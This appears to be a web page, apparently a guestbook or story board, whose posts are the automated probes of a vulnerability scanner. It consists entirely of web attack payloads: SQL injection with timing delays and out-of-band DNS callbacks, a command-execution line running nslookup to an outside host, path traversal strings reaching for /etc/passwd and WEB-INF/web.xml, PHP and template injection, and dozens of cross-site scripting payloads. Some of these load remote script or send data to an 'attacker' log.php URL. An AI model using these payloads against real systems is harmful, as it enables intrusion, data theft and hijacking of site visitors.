-1 OR 3*2<(0+5+766-766)


YWhMUmtBaUw=

1


jkaygfsb

Http://testasp.vulnweb.com/t/fit.txt


ouvvgsww

1


lqekorij

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd


mikennyx

-1 OR 3*2>(0+5+766-766)


jkaygfsb

http://testasp.vulnweb.com/t/fit.txt?.jpg


Anonymous Poster

1


lqekorij

/etc/passwd


sbgmtdar

1&n924521=v955735


mikennyx

-1' OR 2+443-443-1=0+0+0+1 --


dusguucp

)


jkaygfsb

testasp.vulnweb.com


Anonymous Poster

1


lqekorij

%2fetc%2fpasswd


mikennyx

-1' OR 3+443-443-1=0+0+0+1 --


afetxfnk&n994979=v926950

1


http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

1


Anonymous Poster

1


mikennyx

-1' OR 3*2<(0+5+443-443) --


dusguucp

!(()&&!|*|*|


lqekorij

/.././.././.././.././.././.././.././../etc/./passwd%00


mikennyx

-1' OR 3*2>(0+5+443-443) --


dusguucp

^(#$!@#$)(()))******


1some_inexistent_file_with_long_name.jpg

1


lqekorij

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd


)

1


Http://testasp.vulnweb.com/t/fit.txt

1


mikennyx

-1' OR 2+867-867-1=0+0+0+1 or 'FLmmPvAv'='


swhatkhv

'"()


!(()&&!|*|*|

1


http://testasp.vulnweb.com/t/fit.txt?.jpg

1


ilqvmwny

;print(md5(acunetix_wvs_security_test));


lqekorij

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd


mikennyx

-1' OR 3+867-867-1=0+0+0+1 or 'FLmmPvAv'='


^(#$!@#$)(()))******

1


testasp.vulnweb.com

1


Anonymous Poster

1


mikennyx

-1' OR 3*2<(0+5+867-867) or 'FLmmPvAv'='


ilqvmwny

';print(md5(acunetix_wvs_security_test));$a='


lqekorij

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.


'"()

1


mikennyx

-1' OR 3*2>(0+5+867-867) or 'FLmmPvAv'='


lqekorij

file:///etc/passwd


ilqvmwny

";print(md5(acunetix_wvs_security_test));$a="


qvqpfpps

http://testasp.vulnweb.com/t/xss.html?%00.jpg


egxadypt

http://hitpjFtJZcHfz.bxss.me/


dijwwhne

1


lqekorij

/\../\../\../\../\../\../\../etc/passwd


mikennyx

-1" OR 2+42-42-1=0+0+0+1 --


ilqvmwny

${@print(md5(acunetix_wvs_security_test))}


lqekorij

WEB-INF/web.xml


http://testasp.vulnweb.com/t/xss.html?%00.jpg

1


bcoqrama

1


http://hitCHwcq8smJi.bxss.me/

1


dijwwhne

m_ghouls.php


mikennyx

-1" OR 3+42-42-1=0+0+0+1 --


ilqvmwny

${@print(md5(acunetix_wvs_security_test))}\


lqekorij

/WEB-INF/web.xml


bcoqrama

1'"


dijwwhne

m_ghouls.php


;print(md5(acunetix_wvs_security_test));

1


mikennyx

-1" OR 3*2<(0+5+42-42) --


lqekorij

WEB-INF\web.xml


';print(md5(acunetix_wvs_security_test));$a='

1


bcoqrama

\


mikennyx

-1" OR 3*2>(0+5+42-42) --


";print(md5(acunetix_wvs_security_test));$a="

1


brtjcrlb

/www.vulnweb.com


dijwwhne

m_ghouls.php/.


uywpopxc

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


mikennyx

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/


../../../../../../../../../../etc/passwd

1


${@print(md5(acunetix_wvs_security_test))}

1


bcoqrama

@@b7tap


${@print(md5(acunetix_wvs_security_test))}\

1


brtjcrlb

944182


mikennyx

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/


dijwwhne

1


)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1


../../../../../../../../../../../../../../../proc/version

1


bcoqrama

JyI=


brtjcrlb

http://www.vulnweb.com


mikennyx

-1; waitfor delay '0:0:9' --


m_ghouls.php

1


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1


irhmmrad

'"


mikennyx

-1); waitfor delay '0:0:9' --


m_ghouls.php

1


brtjcrlb

//www.vulnweb.com


../../../../../../../../../../etc/passwd.jpg

1


m_ghouls.php/.

1


qyhxqhvf

1'"()&%<acx><ScRiPt >aukO(9779)</ScRiPt>


brtjcrlb

/\www.vulnweb.com


mikennyx

1 waitfor delay '0:0:9' --


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1


bcoqrama

1


irhmmrad

<!--


/../..//../..//../..//../..//../..//etc/passwd.jpg

1


1'"

1


mikennyx

m7uKYDyF'; waitfor delay '0:0:3' --


/www.vulnweb.com

1


'"

1


\

1


.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1


qyhxqhvf

'"()&%<acx><ScRiPt >aukO(9738)</ScRiPt>


mikennyx

-1;select pg_sleep(3); --


958486

1


Anonymous Poster

1


/etc/passwd

1


<!--

1


http://www.vulnweb.com

1


@@xwQeY

1


%2fetc%2fpasswd

1


qyhxqhvf

19652387


mikennyx

-1);select pg_sleep(3); --


JyI=

1


mikennyx

-1));select pg_sleep(3); --


//www.vulnweb.com

1


/.././.././.././.././.././.././.././../etc/./passwd%00

1


Anonymous Poster

1


mikennyx

UhdqPkGY';select pg_sleep(3); --


qyhxqhvf

acu6855<s1﹥s2ʺs3ʹuca6855


/\www.vulnweb.com

1


Anonymous Poster

1


../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1


mikennyx

sf5po8Qx');select pg_sleep(3); --


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1


mikennyx

fcueBPKX'));select pg_sleep(6); --


qyhxqhvf

{{9999725*9999295}}


mikennyx

1||UTL_INADDR.get_host_address('dns.'||'sqli.013511.487-544.487.ab1c9.1.bxss'||'.me')


Anonymous Poster

1


qyhxqhvf

1<ScRiPt >aukO(9245)</ScRiPt>


mikennyx

'||UTL_INADDR.get_host_address('dns.'||'sqli.013511.487-545.487.ab1c9.1.bxss'||'.me')||'


invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1


qyhxqhvf

1<WZKBSQ>VQ0CS[!+!]</WZKBSQ>


mikennyx

1;copy (select '') to program 'nslookup dns.sqli.\013511.487-546.487.ab1c9.\1.bxss.me'


qyhxqhvf

1<script>aukO(9964)</script>


file:///etc/passwd

1


mikennyx

1';copy (select '') to program 'nslookup dns.sqli.\013511.487-547.487.ab1c9.\1.bxss.me


qyhxqhvf

1<ScR<ScRiPt>IpT>aukO(9417)</sCr<ScRiPt>IpT>


/\../\../\../\../\../\../\../etc/passwd

1


mikennyx

632'


qyhxqhvf

1<ScRiPt >aukO(9760)</ScRiPt>


WEB-INF/web.xml

1


mikennyx

1


qyhxqhvf

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9122></ScRiPt>


/WEB-INF/web.xml

1


mikennyx

1


qyhxqhvf

1<ScRiPt >aukO(9588)</ScRiPt>


WEB-INF\web.xml

1


-1 OR 2+607-607-1=0+0+0+1 --

1


qyhxqhvf

1<video><source onerror="javascript:aukO(9885)">


-1 OR 3+607-607-1=0+0+0+1 --

1


qyhxqhvf

1<isindex type=image src=1 onerror=aukO(9946)>


qyhxqhvf

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9179'>


-1 OR 3*2<(0+5+607-607) --

1


qyhxqhvf

1<body onload=aukO(9980)>


qyhxqhvf

1<img src=//testasp.vulnweb.com/t/dot.gif onload=aukO(9770)>


-1 OR 3*2>(0+5+607-607) --

1


qyhxqhvf

1<img src=xyz OnErRor=aukO(9888)>


-1 OR 2+502-502-1=0+0+0+1

1


qyhxqhvf

1<img/src=">" onerror=alert(9253)>


-1 OR 3+502-502-1=0+0+0+1

1


qyhxqhvf

%31%3C%53%63%52%69%50%74%20%3E%61%75%6B%4F%289654%29%3C%2F%73%43%72%69%70%54%3E


-1 OR 3*2<(0+5+502-502)

1


qyhxqhvf

1\u003CScRiPt\aukO(9593)\u003C/sCripT\u003E


-1 OR 3*2>(0+5+502-502)

1


qyhxqhvf

1&lt;ScRiPt&gt;aukO(9061)&lt;/sCripT&gt;


-1' OR 2+184-184-1=0+0+0+1 --

1


-1' OR 3+184-184-1=0+0+0+1 --

1


qyhxqhvf

1<input autofocus onfocus=aukO(9882)>


qyhxqhvf

<a HrEF=http://www.vulnweb.com></a>


-1' OR 3*2<(0+5+184-184) --

1


qyhxqhvf

<a HrEF=jaVaScRiPT:>


-1' OR 3*2>(0+5+184-184) --

1


qyhxqhvf

[url=http://www.vulnweb.com][/url]


-1' OR 2+476-476-1=0+0+0+1 or '90toamcc'='

1


qyhxqhvf

1<img<!-- --> src=x onerror=alert(9299);//><!-- -->


-1' OR 3+476-476-1=0+0+0+1 or '90toamcc'='

1


-1' OR 3*2<(0+5+476-476) or '90toamcc'='

1


qyhxqhvf

1}body{acu:Expre/**/SSion(aukO(9546))}


-1' OR 3*2>(0+5+476-476) or '90toamcc'='

1


qyhxqhvf

1<% contenteditable onresize=aukO(9731)>


-1" OR 2+295-295-1=0+0+0+1 --

1


qyhxqhvf

1y4HFm <ScRiPt >aukO(9714)</ScRiPt>


-1" OR 3+295-295-1=0+0+0+1 --

1


qyhxqhvf

1<WB5N7N>ZZ5PG[!+!]</WB5N7N>


-1" OR 3*2<(0+5+295-295) --

1


qyhxqhvf

1<ifRAme sRc=9702.com></IfRamE>


qyhxqhvf

1<W16hbN x=9749>


-1" OR 3*2>(0+5+295-295) --

1


qyhxqhvf

1<img sRc='http://attacker-9957/log.php?


qyhxqhvf

1<jyppgz<


qyhxqhvf'"()&%<acx><ScRiPt >aukO(9179)</ScRiPt>

1


if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1


(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1


'"()&%<acx><ScRiPt >aukO(9786)</ScRiPt>

1


1 waitfor delay '0:0:6' --

1


rUVeL2PL'; waitfor delay '0:0:6' --

1


qyhxqhvf9710599

1


gJqxmc1W';select pg_sleep(6); --

1


acu6831<s1﹥s2ʺs3ʹuca6831

1


h5SVHzwZ');select pg_sleep(9); --

1


4cQ6DNGV'));select pg_sleep(9); --

1


Anonymous Poster

1


'||UTL_INADDR.get_host_address('dns.'||'sqli.013511.487-558.487.ab1c9.1.bxss'||'.me')||'

1


Anonymous Poster

1


mikennyx';copy (select '') to program 'nslookup dns.sqli.\013511.487-560.487.ab1c9.\1.bxss.me

1


718'

1


{{9999857*10000229}}

1


qyhxqhvf<ScRiPt >aukO(9377)</ScRiPt>

1


qyhxqhvf<WQJ9CS>PJ3Q8[!+!]</WQJ9CS>

1


qyhxqhvf<script>aukO(9223)</script>

1


qyhxqhvf<ScR<ScRiPt>IpT>aukO(9863)</sCr<ScRiPt>IpT>

1


qyhxqhvf<ScRiPt >aukO(9476)</ScRiPt>

1


qyhxqhvf<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9408></ScRiPt>

1


qyhxqhvf<ScRiPt >aukO(9111)</ScRiPt>

1


qyhxqhvf<video><source onerror="javascript:aukO(9016)">

1


Anonymous Poster

1


qyhxqhvf<isindex type=image src=1 onerror=aukO(9082)>

1


qyhxqhvf<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9195'>

1


qyhxqhvf<body onload=aukO(9204)>

1


qyhxqhvf<img src=//testasp.vulnweb.com/t/dot.gif onload=aukO(9286)>

1


qyhxqhvf<img src=xyz OnErRor=aukO(9673)>

1


qyhxqhvf<img/src=">" onerror=alert(9251)>

1


%71%79%68%78%71%68%76%66%3C%53%63%52%69%50%74%20%3E%61%75%6B%4F%289729%29%3C%2F%73%43%72%69%70%54%3E

1


qyhxqhvf\u003CScRiPt\aukO(9285)\u003C/sCripT\u003E

1


qyhxqhvf&lt;ScRiPt&gt;aukO(9056)&lt;/sCripT&gt;

1


Anonymous Poster

1


qyhxqhvf<input autofocus onfocus=aukO(9153)>

1


<a HrEF=http://www.vulnweb.com></a>

1


<a HrEF=jaVaScRiPT:>

1


[url=http://www.vulnweb.com][/url]

1


qyhxqhvf<img<!-- --> src=x onerror=alert(9196);//><!-- -->

1


qyhxqhvf}body{acu:Expre/**/SSion(aukO(9311))}

1


qyhxqhvf<% contenteditable onresize=aukO(9391)>

1


qyhxqhvf4Ye9k <ScRiPt >aukO(9105)</ScRiPt>

1


qyhxqhvf<WQ5RYD>LYTBE[!+!]</WQ5RYD>

1


qyhxqhvf<ifRAme sRc=9389.com></IfRamE>

1


qyhxqhvf<Zzy4hC x=9810>

1


qyhxqhvf<img sRc='http://attacker-9325/log.php?

1


qyhxqhvf<7mwukn<

1


goxhqxwy

1acuMhJ6BA8lFN


1acut3dbnWLo7q

1


hxgbpxow

1'"()&%<acx><ScRiPt >VLtP(9872)</ScRiPt>


hxgbpxow

'"()&%<acx><ScRiPt >VLtP(9967)</ScRiPt>


hxgbpxow

19777969


hxgbpxow

acu3881<s1﹥s2ʺs3ʹuca3881


hxgbpxow

{{9999679*10000180}}


hxgbpxow

1<ScRiPt >VLtP(9607)</ScRiPt>


hxgbpxow

1<WMSVM3>QMHIA[!+!]</WMSVM3>


hxgbpxow

1<script>VLtP(9135)</script>


hxgbpxow

1<ScR<ScRiPt>IpT>VLtP(9908)</sCr<ScRiPt>IpT>


hxgbpxow

1<ScRiPt >VLtP(9862)</ScRiPt>


hxgbpxow

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9044></ScRiPt>


hxgbpxow

1<ScRiPt >VLtP(9293)</ScRiPt>


hxgbpxow

1<video><source onerror="javascript:VLtP(9853)">


hxgbpxow

1<isindex type=image src=1 onerror=VLtP(9536)>


hxgbpxow

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9968'>


hxgbpxow

1<body onload=VLtP(9743)>


hxgbpxow

1<img src=//testasp.vulnweb.com/t/dot.gif onload=VLtP(9672)>


hxgbpxow

1<img src=xyz OnErRor=VLtP(9831)>


hxgbpxow

1<img/src=">" onerror=alert(9700)>


hxgbpxow

%31%3C%53%63%52%69%50%74%20%3E%56%4C%74%50%289041%29%3C%2F%73%43%72%69%70%54%3E


hxgbpxow

1\u003CScRiPt\VLtP(9281)\u003C/sCripT\u003E


hxgbpxow

1&lt;ScRiPt&gt;VLtP(9126)&lt;/sCripT&gt;


hxgbpxow

1<input autofocus onfocus=VLtP(9004)>


hxgbpxow

<a HrEF=http://www.vulnweb.com></a>


hxgbpxow

<a HrEF=jaVaScRiPT:>


hxgbpxow

[url=http://www.vulnweb.com][/url]


hxgbpxow

1<img<!-- --> src=x onerror=alert(9279);//><!-- -->


hxgbpxow

1}body{acu:Expre/**/SSion(VLtP(9268))}


hxgbpxow

1<% contenteditable onresize=VLtP(9201)>


hxgbpxow

1wXSm0 <ScRiPt >VLtP(9244)</ScRiPt>


hxgbpxow

1<W5ITMX>AABVR[!+!]</W5ITMX>


hxgbpxow

1<ifRAme sRc=9484.com></IfRamE>


hxgbpxow

1<C3RZwq x=9749>


hxgbpxow

1<img sRc='http://attacker-9842/log.php?


hxgbpxow

1<V6n8HD<


kaogclnf'"()&%<acx><ScRiPt >VLtP(9493)</ScRiPt>

1


'"()&%<acx><ScRiPt >VLtP(9415)</ScRiPt>

1


kaogclnf9829303

1


acu1964<s1﹥s2ʺs3ʹuca1964

1


Anonymous Poster

1


Anonymous Poster

1


{{10000152*9999175}}

1


kaogclnf<ScRiPt >VLtP(9282)</ScRiPt>

1


kaogclnf<WDJFRJ>SLSV0[!+!]</WDJFRJ>

1


kaogclnf<script>VLtP(9707)</script>

1


kaogclnf<ScR<ScRiPt>IpT>VLtP(9882)</sCr<ScRiPt>IpT>

1


kaogclnf<ScRiPt >VLtP(9128)</ScRiPt>

1


kaogclnf<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9628></ScRiPt>

1


kaogclnf<ScRiPt >VLtP(9842)</ScRiPt>

1


kaogclnf<video><source onerror="javascript:VLtP(9439)">

1


Anonymous Poster

1


kaogclnf<isindex type=image src=1 onerror=VLtP(9732)>

1


kaogclnf<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9129'>

1


kaogclnf<body onload=VLtP(9333)>

1


kaogclnf<img src=//testasp.vulnweb.com/t/dot.gif onload=VLtP(9093)>

1


kaogclnf<img src=xyz OnErRor=VLtP(9003)>

1


kaogclnf<img/src=">" onerror=alert(9426)>

1


%6B%61%6F%67%63%6C%6E%66%3C%53%63%52%69%50%74%20%3E%56%4C%74%50%289648%29%3C%2F%73%43%72%69%70%54%3E

1


kaogclnf\u003CScRiPt\VLtP(9353)\u003C/sCripT\u003E

1


kaogclnf&lt;ScRiPt&gt;VLtP(9340)&lt;/sCripT&gt;

1


Anonymous Poster

1


kaogclnf<input autofocus onfocus=VLtP(9643)>

1


<a HrEF=http://www.vulnweb.com></a>

1


<a HrEF=jaVaScRiPT:>

1


[url=http://www.vulnweb.com][/url]

1


kaogclnf<img<!-- --> src=x onerror=alert(9043);//><!-- -->

1


kaogclnf}body{acu:Expre/**/SSion(VLtP(9052))}

1


kaogclnf<% contenteditable onresize=VLtP(9674)>

1


kaogclnfdQ8sB <ScRiPt >VLtP(9232)</ScRiPt>

1


kaogclnf<W6T6B6>BDVZF[!+!]</W6T6B6>

1


kaogclnf<ifRAme sRc=9436.com></IfRamE>

1


kaogclnf<YFgneq x=9071>

1


kaogclnf<img sRc='http://attacker-9707/log.php?

1


kaogclnf<zRNC5e<

1



Post a story: